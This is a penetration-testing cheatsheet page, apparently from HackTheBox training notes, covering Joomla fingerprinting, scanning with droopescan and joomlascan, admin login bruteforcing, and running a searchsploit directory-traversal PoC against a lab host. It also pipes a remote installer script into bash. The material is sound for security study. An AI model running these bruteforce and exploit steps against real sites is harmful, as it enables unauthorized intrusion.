LinkedIn

Joomla

Joomla, released in August 2005 is another free and open-source CMS used for discussion forums, photo galleries, e-Commerce, user-based communities, and more. It is written in PHP and uses MySQL in the backend. Like WordPress, Joomla can be enhanced with over 7,000 extensions and over 1,000 templates. There are up to 2.5 million sites on the internet running Joomla. Here are some interesting statistics about Joomla:

  • Joomla accounts for 3.5% of the CMS market share

  • Joomla is 100% free and means "all together" in Swahili (phonetic spelling of "Jumla")

  • The Joomla community has close to 700,000 in its online forums

  • Joomla powers 3% of all websites on the internet, nearly 25,000 of the top 1 million sites worldwide (just 10% of the reach of WordPress)

  • Some notable organizations that use Joomla include eBay, Yamaha, Harvard University, and the UK government

  • Over the years, 770 different developers have contributed to Joomla

Joomla collects some anonymous usage statistics such as the breakdown of Joomla, PHP and database versions and server operating systems in use on Joomla installations. This data can be queried via their public API.

Querying this API, we can see over 2.7 million Joomla installs!

        shellsession
HackJiji@htb[/htb]$ curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool

Enumeration (manually)

Identify Joomla

curl -s http://dev.inlanefreight.local/ | grep Joomla

Fingerprint Joomla version

curl -s http://dev.inlanefreight.local/README.txt | head -n 5
fingerprint the version from JavaScript files in the media/system/js/ directory or by browsing to administrator/manifests/files/joomla.xml
curl -s http://dev.inlanefreight.local/administrator/manifests/files/joomla.xml | xmllint --format -

Enumeration & Attacks using automated tools

  • Droopescan:

sudo pip3 install droopescan
droopescan scan joomla --url http://dev.inlanefreight.local/

  • Joompla scan:

Python 2.8 Installation:

#Requires python 2.8:
curl https://pyenv.run | bash
echo 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.bashrc
echo 'command -v pyenv >/dev/null || export PATH="$PYENV_ROOT/bin:$PATH"' >> ~/.bashrc
echo 'eval "$(pyenv init -)"' >> ~/.bashrc
source ~/.bashrc
pyenv install 2.7

pyenv shell 2.7

python2.7 -m pip install urllib3
python2.7 -m pip install certifi
python2.7 -m pip install bs4

Tool usage:

python2.7 joomlascan.py -u http://dev.inlanefreight.local

Bruteforce Joomla login credentials

git clone https://github.com/ajnik/joomla-bruteforce.git

sudo python3 joomla-brute.py -u http://dev.inlanefreight.local -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin

After loggin in on the Joomla application, if you receive an error stating "An error has occurred. Call to a member function format() on null" after logging in, navigate to "http://dev.inlanefreight.local/administrator/index.php?option=com_plugins" and disable the "Quick Icon - PHP Version Check" plugin. This will allow the control panel to display properly.

Search for known exploits based on the version identified with searchsploit:

#search for a known exploit 
searchsploit joomla 3.0

#copy the poc to home folder
searchsploit -m 4578

#run the script as shown in the following example
ython2.7 joomla_dir_trav.py --url "http://dev.inlanefreight.local/administrator/" --username admin --password admin --dir

PreviousWordpressNextWeb pentest cheatsheet

Last updated